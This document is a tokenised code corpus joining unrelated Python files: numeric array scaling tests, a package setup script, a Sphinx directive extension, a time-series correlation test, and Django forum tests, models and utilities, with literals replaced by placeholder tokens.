calculate_scale ( npa ( [ - <NUM_LIT:2> , - <NUM_LIT:1> ] , dtype = np . 
int8 ) , np . uint8 , True ) <EOL> assert_equal ( res , ( <NUM_LIT:1.0> , - <NUM_LIT> , None , None ) ) <EOL> res = calculate_scale ( npa ( [ - <NUM_LIT:2> , - <NUM_LIT:1> ] , dtype = np . int8 ) , np . uint8 , <NUM_LIT:0> ) <EOL> assert_equal ( res , ( - <NUM_LIT:1.0> , <NUM_LIT:0.0> , None , None ) ) <EOL> res = calculate_scale ( npa ( [ - <NUM_LIT:1> , <NUM_LIT:1> ] , dtype = np . int8 ) , np . uint8 , <NUM_LIT:1> ) <EOL> assert_equal ( res , ( <NUM_LIT:1.0> , - <NUM_LIT:1.0> , None , None ) ) <EOL> assert_raises ( ValueError , <EOL> calculate_scale , npa ( [ - <NUM_LIT:1> , <NUM_LIT:1> ] , dtype = np . int8 ) , np . uint8 , <NUM_LIT:0> ) <EOL> res = calculate_scale ( npa ( [ - <NUM_LIT:1> , <NUM_LIT:255> ] , dtype = np . int16 ) , np . uint8 , <NUM_LIT:1> ) <EOL> assert_not_equal ( res , ( <NUM_LIT:1.0> , - <NUM_LIT:1.0> , None , None ) ) <EOL> def test_a2f_mn_mx ( ) : <EOL> str_io = BytesIO ( ) <EOL> for out_type in ( np . int16 , np . float32 ) : <EOL> arr = np . arange ( <NUM_LIT:6> , dtype = out_type ) <EOL> arr_orig = arr . copy ( ) <EOL> array_to_file ( arr , str_io ) <EOL> data_back = array_from_file ( arr . shape , out_type , str_io ) <EOL> assert_array_equal ( arr , data_back ) <EOL> array_to_file ( arr , str_io , mn = <NUM_LIT:2> ) <EOL> data_back = array_from_file ( arr . shape , out_type , str_io ) <EOL> assert_array_equal ( arr , arr_orig ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> array_to_file ( arr , str_io , mx = <NUM_LIT:4> ) <EOL> data_back = array_from_file ( arr . shape , out_type , str_io ) <EOL> assert_array_equal ( arr , arr_orig ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> ] ) <EOL> array_to_file ( arr , str_io , mn = <NUM_LIT:2> , mx = <NUM_LIT:4> ) <EOL> data_back = array_from_file ( arr . 
shape , out_type , str_io ) <EOL> assert_array_equal ( arr , arr_orig ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> ] ) <EOL> def test_a2f_nan2zero ( ) : <EOL> arr = np . array ( [ np . nan , <NUM_LIT> ] , dtype = np . float32 ) <EOL> str_io = BytesIO ( ) <EOL> array_to_file ( arr , str_io ) <EOL> data_back = array_from_file ( arr . shape , np . float32 , str_io ) <EOL> assert_array_equal ( np . isnan ( data_back ) , [ True , False ] ) <EOL> array_to_file ( arr , str_io , nan2zero = True ) <EOL> data_back = array_from_file ( arr . shape , np . float32 , str_io ) <EOL> assert_array_equal ( np . isnan ( data_back ) , [ True , False ] ) <EOL> with np . errstate ( invalid = '<STR_LIT:ignore>' ) : <EOL> array_to_file ( arr , str_io , np . int32 , nan2zero = True ) <EOL> data_back = array_from_file ( arr . shape , np . int32 , str_io ) <EOL> assert_array_equal ( data_back , [ <NUM_LIT:0> , <NUM_LIT> ] ) <EOL> with np . errstate ( invalid = '<STR_LIT:ignore>' ) : <EOL> array_to_file ( arr , str_io , np . int32 , nan2zero = False ) <EOL> data_back = array_from_file ( arr . shape , np . int32 , str_io ) <EOL> assert_array_equal ( data_back , [ np . array ( np . nan ) . astype ( np . int32 ) , <NUM_LIT> ] ) <EOL> def test_array_file_scales ( ) : <EOL> bio = BytesIO ( ) <EOL> for in_type , out_type , err in ( ( np . int16 , np . int16 , None ) , <EOL> ( np . int16 , np . int8 , None ) , <EOL> ( np . uint16 , np . uint8 , None ) , <EOL> ( np . int32 , np . int8 , None ) , <EOL> ( np . float32 , np . uint8 , None ) , <EOL> ( np . float32 , np . int16 , None ) ) : <EOL> out_dtype = np . dtype ( out_type ) <EOL> arr = np . 
zeros ( ( <NUM_LIT:3> , ) , dtype = in_type ) <EOL> info = type_info ( in_type ) <EOL> arr [ <NUM_LIT:0> ] , arr [ <NUM_LIT:1> ] = info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] <EOL> if not err is None : <EOL> assert_raises ( err , calculate_scale , arr , out_dtype , True ) <EOL> continue <EOL> slope , inter , mn , mx = calculate_scale ( arr , out_dtype , True ) <EOL> array_to_file ( arr , bio , out_type , <NUM_LIT:0> , inter , slope , mn , mx ) <EOL> bio . seek ( <NUM_LIT:0> ) <EOL> arr2 = array_from_file ( arr . shape , out_dtype , bio ) <EOL> arr3 = apply_read_scaling ( arr2 , slope , inter ) <EOL> max_miss = slope / <NUM_LIT> <EOL> assert_true ( np . all ( np . abs ( arr - arr3 ) <= max_miss ) ) <EOL> bio . truncate ( <NUM_LIT:0> ) <EOL> bio . seek ( <NUM_LIT:0> ) <EOL> def test_scaling_in_abstract ( ) : <EOL> for category0 , category1 in ( ( '<STR_LIT:int>' , '<STR_LIT:int>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:int>' ) , <EOL> ) : <EOL> for in_type in np . sctypes [ category0 ] : <EOL> for out_type in np . sctypes [ category1 ] : <EOL> check_int_a2f ( in_type , out_type ) <EOL> for category0 , category1 in ( ( '<STR_LIT:float>' , '<STR_LIT:int>' ) , <EOL> ( '<STR_LIT:float>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:int>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) : <EOL> for in_type in np . sctypes [ category0 ] : <EOL> for out_type in np . sctypes [ category1 ] : <EOL> with suppress_warnings ( ) : <EOL> check_int_a2f ( in_type , out_type ) <EOL> def check_int_a2f ( in_type , out_type ) : <EOL> big_floater = np . maximum_sctype ( np . float ) <EOL> info = type_info ( in_type ) <EOL> this_min , this_max = info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] <EOL> if not in_type in np . sctypes [ '<STR_LIT>' ] : <EOL> data = np . array ( [ this_min , this_max ] , in_type ) <EOL> if not np . all ( np . isfinite ( data ) ) : <EOL> if DEBUG : <EOL> print ( '<STR_LIT>' % in_type ) <EOL> return <EOL> else : <EOL> data = np . 
zeros ( ( <NUM_LIT:2> , ) , in_type ) <EOL> data [ <NUM_LIT:0> ] = this_min + <NUM_LIT> <EOL> data [ <NUM_LIT:1> ] = this_max + <NUM_LIT> <EOL> str_io = BytesIO ( ) <EOL> try : <EOL> scale , inter , mn , mx = calculate_scale ( data , out_type , True ) <EOL> except ValueError as e : <EOL> if DEBUG : <EOL> print ( in_type , out_type , e ) <EOL> return <EOL> array_to_file ( data , str_io , out_type , <NUM_LIT:0> , inter , scale , mn , mx ) <EOL> data_back = array_from_file ( data . shape , out_type , str_io ) <EOL> data_back = apply_read_scaling ( data_back , scale , inter ) <EOL> assert_true ( np . allclose ( big_floater ( data ) , big_floater ( data_back ) ) ) <EOL> scale32 = np . float32 ( scale ) <EOL> inter32 = np . float32 ( inter ) <EOL> if scale32 == np . inf or inter32 == np . inf : <EOL> return <EOL> data_back = array_from_file ( data . shape , out_type , str_io ) <EOL> data_back = apply_read_scaling ( data_back , scale32 , inter32 ) <EOL> info = type_info ( in_type ) <EOL> out_min , out_max = info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] <EOL> assert_true ( np . allclose ( big_floater ( data ) , <EOL> big_floater ( np . clip ( data_back , out_min , out_max ) ) ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from os . path import join as pjoin <EOL> import sys <EOL> from functools import partial <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> os . remove ( '<STR_LIT>' ) <EOL> if len ( set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) . intersection ( sys . argv ) ) > <NUM_LIT:0> : <EOL> import setup_egg <EOL> from distutils . core import setup <EOL> from nisext . sexts import get_comrec_build , package_check , install_scripts_bat <EOL> cmdclass = { '<STR_LIT>' : get_comrec_build ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : install_scripts_bat } <EOL> ver_file = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> exec ( open ( ver_file ) . read ( ) ) <EOL> if '<STR_LIT>' in sys . modules : <EOL> extra_setuptools_args = dict ( <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> extras_require = dict ( <EOL> doc = '<STR_LIT>' , <EOL> test = '<STR_LIT>' ) , <EOL> ) <EOL> pkg_chk = partial ( package_check , setuptools_args = extra_setuptools_args ) <EOL> else : <EOL> extra_setuptools_args = { } <EOL> pkg_chk = package_check <EOL> pkg_chk ( '<STR_LIT>' , NUMPY_MIN_VERSION ) <EOL> custom_pydicom_messages = { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } <EOL> pkg_chk ( '<STR_LIT>' , <EOL> PYDICOM_MIN_VERSION , <EOL> optional = '<STR_LIT>' , <EOL> messages = custom_pydicom_messages ) <EOL> def main ( ** extra_args ) : <EOL> setup ( name = NAME , <EOL> maintainer = MAINTAINER , <EOL> maintainer_email = MAINTAINER_EMAIL , <EOL> description = DESCRIPTION , <EOL> long_description = LONG_DESCRIPTION , <EOL> url = URL , <EOL> download_url = DOWNLOAD_URL , <EOL> license = LICENSE , <EOL> classifiers = CLASSIFIERS , <EOL> author = AUTHOR , <EOL> author_email = AUTHOR_EMAIL , <EOL> platforms = PLATFORMS , <EOL> version = VERSION , <EOL> requires = REQUIRES , <EOL> provides = 
PROVIDES , <EOL> packages = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : <EOL> [ pjoin ( '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT:*>' ) , <EOL> ] } , <EOL> scripts = [ pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> pjoin ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] , <EOL> cmdclass = cmdclass , <EOL> ** extra_args <EOL> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ** extra_setuptools_args ) </s>
<s> from docutils . nodes import Body , Element <EOL> from docutils . parsers . rst import directives <EOL> class only_base ( Body , Element ) : <EOL> def dont_traverse ( self , * args , ** kwargs ) : <EOL> return [ ] <EOL> class html_only ( only_base ) : <EOL> pass <EOL> class latex_only ( only_base ) : <EOL> pass <EOL> def run ( content , node_class , state , content_offset ) : <EOL> text = '<STR_LIT:\n>' . join ( content ) <EOL> node = node_class ( text ) <EOL> state . nested_parse ( content , content_offset , node ) <EOL> return [ node ] <EOL> def html_only_directive ( name , arguments , options , content , lineno , <EOL> content_offset , block_text , state , state_machine ) : <EOL> return run ( content , html_only , state , content_offset ) <EOL> def latex_only_directive ( name , arguments , options , content , lineno , <EOL> content_offset , block_text , state , state_machine ) : <EOL> return run ( content , latex_only , state , content_offset ) <EOL> def builder_inited ( app ) : <EOL> if app . builder . name == '<STR_LIT:html>' : <EOL> latex_only . traverse = only_base . dont_traverse <EOL> else : <EOL> html_only . traverse = only_base . dont_traverse <EOL> def setup ( app ) : <EOL> app . add_directive ( '<STR_LIT>' , html_only_directive , True , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> app . add_directive ( '<STR_LIT>' , latex_only_directive , True , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> app . add_node ( html_only ) <EOL> app . add_node ( latex_only ) <EOL> def visit_perform ( self , node ) : <EOL> pass <EOL> def depart_perform ( self , node ) : <EOL> pass <EOL> def visit_ignore ( self , node ) : <EOL> node . children = [ ] <EOL> def depart_ignore ( self , node ) : <EOL> node . children = [ ] <EOL> app . add_node ( html_only , html = ( visit_perform , depart_perform ) ) <EOL> app . add_node ( html_only , latex = ( visit_ignore , depart_ignore ) ) <EOL> app . 
add_node ( latex_only , latex = ( visit_perform , depart_perform ) ) <EOL> app . add_node ( latex_only , html = ( visit_ignore , depart_ignore ) ) </s>
<s> import numpy as np <EOL> import numpy . testing as npt <EOL> import nitime . timeseries as ts <EOL> import nitime . analysis as nta <EOL> def test_SeedCorrelationAnalyzer ( ) : <EOL> targ = ts . TimeSeries ( np . random . rand ( <NUM_LIT:10> , <NUM_LIT:10> ) , sampling_interval = <NUM_LIT:1> ) <EOL> seed = ts . TimeSeries ( np . random . rand ( <NUM_LIT:10> ) , sampling_interval = <NUM_LIT:1> ) <EOL> corr = nta . SeedCorrelationAnalyzer ( seed , targ ) <EOL> our_coef_array = corr . corrcoef <EOL> np_coef_array = np . array ( [ np . corrcoef ( seed . data , a ) [ <NUM_LIT:0> , <NUM_LIT:1> ] for a in targ . data ] ) <EOL> npt . assert_array_almost_equal ( our_coef_array , np_coef_array ) <EOL> seed = ts . TimeSeries ( np . random . rand ( <NUM_LIT:2> , <NUM_LIT:10> ) , sampling_interval = <NUM_LIT:1> ) <EOL> corr = nta . SeedCorrelationAnalyzer ( seed , targ ) <EOL> our_coef_array = corr . corrcoef <EOL> for source in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> np_coef_array = np . array ( <EOL> [ np . corrcoef ( seed . data [ source ] , a ) [ <NUM_LIT:0> , <NUM_LIT:1> ] for a in targ . data ] ) <EOL> npt . assert_array_almost_equal ( our_coef_array [ source ] , np_coef_array ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from glob import glob <EOL> import matplotlib <EOL> import matplotlib . pyplot as plt <EOL> from matplotlib . _pylab_helpers import Gcf <EOL> from toollib import * <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> examples_header = """<STR_LIT>""" <EOL> figure_basename = None <EOL> def show ( ) : <EOL> """<STR_LIT>""" <EOL> allfm = Gcf . get_all_fig_managers ( ) <EOL> for fcount , fm in enumerate ( allfm ) : <EOL> fm . canvas . figure . savefig ( '<STR_LIT>' % <EOL> ( figure_basename , fcount + <NUM_LIT:1> ) ) <EOL> _mpl_show = plt . show <EOL> plt . show = show <EOL> cd ( '<STR_LIT>' ) <EOL> if not os . getcwd ( ) . endswith ( '<STR_LIT>' ) : <EOL> raise OSError ( '<STR_LIT>' ) <EOL> sh ( '<STR_LIT>' ) <EOL> index = open ( '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> index . write ( examples_header ) <EOL> for name in [ os . path . splitext ( f ) [ <NUM_LIT:0> ] for f in glob ( '<STR_LIT>' ) ] : <EOL> if name not in ( [ '<STR_LIT:index>' , '<STR_LIT>' ] ) : <EOL> index . write ( '<STR_LIT>' % name ) <EOL> index . close ( ) <EOL> if '<STR_LIT>' in sys . argv : <EOL> pass <EOL> else : <EOL> if not os . path . isdir ( '<STR_LIT>' ) : <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> for script in glob ( '<STR_LIT>' ) : <EOL> print ( script ) <EOL> figure_basename = pjoin ( '<STR_LIT>' , os . path . splitext ( script ) [ <NUM_LIT:0> ] ) <EOL> with open ( script ) as f : <EOL> exec ( f . read ( ) ) <EOL> plt . close ( '<STR_LIT:all>' ) </s>
<s> from __future__ import unicode_literals <EOL> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . test import TestCase <EOL> from django . core . urlresolvers import reverse <EOL> from django . template import Template , Context <EOL> from django . core . cache import cache <EOL> from ... core . tests import utils <EOL> from . . models import Comment <EOL> from . models import CommentLike <EOL> from . forms import LikeForm <EOL> from . tags import render_like_form <EOL> class LikeViewTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . clear ( ) <EOL> self . user = utils . create_user ( ) <EOL> self . category = utils . create_category ( ) <EOL> self . topic = utils . create_topic ( category = self . category , user = self . user ) <EOL> self . comment = utils . create_comment ( topic = self . topic ) <EOL> def test_like_create ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , self . comment . get_absolute_url ( ) , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> self . assertEqual ( len ( CommentLike . objects . all ( ) ) , <NUM_LIT:1> ) <EOL> def test_like_create_next ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> form_data = { '<STR_LIT>' : '<STR_LIT>' , } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , '<STR_LIT>' , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> def test_like_create_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> utils . login ( self ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . 
pk , } ) , <EOL> form_data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_like_create_comment_increase_likes_count ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . pk , } ) , <EOL> form_data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( Comment . objects . get ( pk = self . comment . pk ) . likes_count , <NUM_LIT:1> ) <EOL> def test_like_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : like . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , self . comment . get_absolute_url ( ) , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> self . assertEqual ( len ( CommentLike . objects . all ( ) ) , <NUM_LIT:0> ) <EOL> def test_like_delete_next ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> form_data = { '<STR_LIT>' : '<STR_LIT>' , } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : like . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , '<STR_LIT>' , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> def test_like_delete_comment_decrease_likes_count ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> comment = utils . create_comment ( topic = self . topic , likes_count = <NUM_LIT:1> ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = comment ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : like . 
pk , } ) , <EOL> form_data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( Comment . objects . get ( pk = comment . pk ) . likes_count , <NUM_LIT:0> ) <EOL> class LikeFormTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . clear ( ) <EOL> self . user = utils . create_user ( ) <EOL> self . category = utils . create_category ( ) <EOL> self . topic = utils . create_topic ( category = self . category , user = self . user ) <EOL> self . comment = utils . create_comment ( user = self . user , topic = self . topic ) <EOL> def test_like_create ( self ) : <EOL> """<STR_LIT>""" <EOL> form_data = { } <EOL> form = LikeForm ( data = form_data ) <EOL> form . comment = self . comment <EOL> form . user = self . user <EOL> self . assertEqual ( form . is_valid ( ) , True ) <EOL> def test_like_create_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> form_data = { } <EOL> form = LikeForm ( data = form_data ) <EOL> form . comment = self . comment <EOL> form . user = self . user <EOL> self . assertEqual ( form . is_valid ( ) , False ) <EOL> class LikeTemplateTagsTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . clear ( ) <EOL> self . user = utils . create_user ( ) <EOL> self . category = utils . create_category ( ) <EOL> self . topic = utils . create_topic ( category = self . category , user = self . user ) <EOL> self . comment = utils . create_comment ( topic = self . topic ) <EOL> def test_like_render_like_form ( self ) : <EOL> """<STR_LIT>""" <EOL> template = Template ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> data = { '<STR_LIT>' : self . comment , '<STR_LIT>' : None } <EOL> template . render ( Context ( data ) ) <EOL> context = render_like_form ( ** data ) <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , None ) <EOL> self . assertIsInstance ( context [ '<STR_LIT>' ] , LikeForm ) <EOL> self . 
assertEqual ( context [ '<STR_LIT>' ] , self . comment . pk ) <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , None ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> data [ '<STR_LIT>' ] = like <EOL> template . render ( Context ( data ) ) <EOL> context = render_like_form ( ** data ) <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , like ) </s>
<s> from __future__ import unicode_literals <EOL> from django . core . management . base import BaseCommand <EOL> from django . core . management import call_command <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> call_command ( '<STR_LIT>' , stdout = self . stdout , stderr = self . stderr ) <EOL> call_command ( '<STR_LIT>' , stdout = self . stdout , stderr = self . stderr ) <EOL> call_command ( '<STR_LIT>' , stdout = self . stdout , stderr = self . stderr , verbosity = <NUM_LIT:0> ) <EOL> self . stdout . write ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> import json <EOL> import hashlib <EOL> from contextlib import contextmanager <EOL> from django . template . loader import render_to_string <EOL> from django . http import HttpResponse <EOL> def render_form_errors ( form ) : <EOL> return render_to_string ( '<STR_LIT>' , { '<STR_LIT>' : form , } ) <EOL> def json_response ( data = None , status = <NUM_LIT:200> ) : <EOL> data = data or { } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = '<STR_LIT:application/json>' , status = status ) <EOL> def mkdir_p ( path ) : <EOL> try : <EOL> os . makedirs ( path ) <EOL> except OSError : <EOL> if not os . path . isdir ( path ) : <EOL> raise <EOL> def get_hash ( file ) : <EOL> md5 = hashlib . md5 ( ) <EOL> for c in file . chunks ( ) : <EOL> md5 . update ( c ) <EOL> return md5 . hexdigest ( ) <EOL> @ contextmanager <EOL> def pushd ( new_dir ) : <EOL> """<STR_LIT>""" <EOL> prev_dir = os . getcwd ( ) <EOL> os . chdir ( new_dir ) <EOL> yield <EOL> os . chdir ( prev_dir ) <EOL> def get_query_string ( request , ** params ) : <EOL> """<STR_LIT>""" <EOL> query_dict = request . GET . copy ( ) <EOL> for k , v in sorted ( params . items ( ) ) : <EOL> query_dict [ k ] = v <EOL> return query_dict . urlencode ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . conf . urls import url <EOL> from django . contrib . auth . decorators import login_required <EOL> from . forms import AdvancedSearchForm <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , login_required ( views . SearchView ( <EOL> template = '<STR_LIT>' , <EOL> form_class = AdvancedSearchForm ) <EOL> ) , name = '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils import timezone <EOL> from . managers import TopicPrivateQuerySet <EOL> class TopicPrivate ( models . Model ) : <EOL> user = models . ForeignKey ( settings . AUTH_USER_MODEL , related_name = '<STR_LIT>' ) <EOL> topic = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> date = models . DateTimeField ( default = timezone . now ) <EOL> objects = TopicPrivateQuerySet . as_manager ( ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> ordering = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> def get_absolute_url ( self ) : <EOL> return self . topic . get_absolute_url ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . apps import AppConfig <EOL> class SpiritUserAuthConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = "<STR_LIT>" <EOL> label = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . test import TestCase <EOL> from django . dispatch import Signal <EOL> from hooks . signalhook import hook <EOL> class MockSignal : <EOL> def __init__ ( self , providing_args = None ) : <EOL> self . providing_args = providing_args <EOL> def connect ( self , func , sender = None , dispatch_uid = None ) : <EOL> self . func = func <EOL> self . sender = sender <EOL> self . dispatch_uid = dispatch_uid <EOL> def disconnect ( self , func , dispatch_uid = None ) : <EOL> self . func = func <EOL> self . dispatch_uid = dispatch_uid <EOL> def send ( self , sender = None , ** kwargs ) : <EOL> self . sender = sender <EOL> self . kwargs = kwargs <EOL> class FakeHook : <EOL> """<STR_LIT>""" <EOL> class SignalHookTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> hook . _registry . clear ( ) <EOL> def test_connect ( self ) : <EOL> def func ( ) : <EOL> pass <EOL> mocksignal = MockSignal ( ) <EOL> hook . _registry [ "<STR_LIT>" ] = mocksignal <EOL> hook . connect ( "<STR_LIT>" , func , sender = FakeHook , dispatch_uid = "<STR_LIT:foo>" ) <EOL> self . assertEqual ( [ mocksignal . func , mocksignal . sender , mocksignal . dispatch_uid ] , <EOL> [ func , FakeHook , "<STR_LIT:foo>" ] ) <EOL> def test_disconnect ( self ) : <EOL> def func ( ) : <EOL> pass <EOL> mocksignal = MockSignal ( ) <EOL> hook . _registry [ "<STR_LIT>" ] = mocksignal <EOL> hook . disconnect ( "<STR_LIT>" , func , dispatch_uid = "<STR_LIT:foo>" ) <EOL> self . assertEqual ( [ mocksignal . func , mocksignal . dispatch_uid ] , <EOL> [ func , "<STR_LIT:foo>" ] ) <EOL> def test_send ( self ) : <EOL> mocksignal = MockSignal ( ) <EOL> hook . _registry [ "<STR_LIT>" ] = mocksignal <EOL> hook . send ( "<STR_LIT>" , sender = FakeHook , extra = "<STR_LIT>" ) <EOL> self . assertEqual ( [ mocksignal . sender , mocksignal . 
kwargs ] , <EOL> [ FakeHook , { '<STR_LIT>' : "<STR_LIT>" , } ] ) <EOL> def test_connect_and_send ( self ) : <EOL> """<STR_LIT>""" <EOL> def func_a ( signal , sender , ** kwargs ) : <EOL> self . _kwargs_a = kwargs <EOL> def func_b ( signal , sender , extra , ** kwargs ) : <EOL> self . _extra_b = extra <EOL> def func_c ( sender , extra , ** kwargs ) : <EOL> self . _extra_c = extra <EOL> def func_d ( extra , ** kwargs ) : <EOL> self . _extra_d = extra <EOL> hook . connect ( "<STR_LIT>" , func_a , sender = FakeHook ) <EOL> hook . connect ( "<STR_LIT>" , func_b , sender = FakeHook ) <EOL> hook . connect ( "<STR_LIT>" , func_c , sender = FakeHook ) <EOL> hook . connect ( "<STR_LIT>" , func_d , sender = FakeHook ) <EOL> hook . send ( "<STR_LIT>" , sender = FakeHook , extra = "<STR_LIT>" ) <EOL> self . assertDictEqual ( self . _kwargs_a , { '<STR_LIT>' : "<STR_LIT>" , } ) <EOL> self . assertEqual ( self . _extra_b , "<STR_LIT>" ) <EOL> self . assertEqual ( self . _extra_c , "<STR_LIT>" ) <EOL> self . assertEqual ( self . _extra_d , "<STR_LIT>" ) </s>
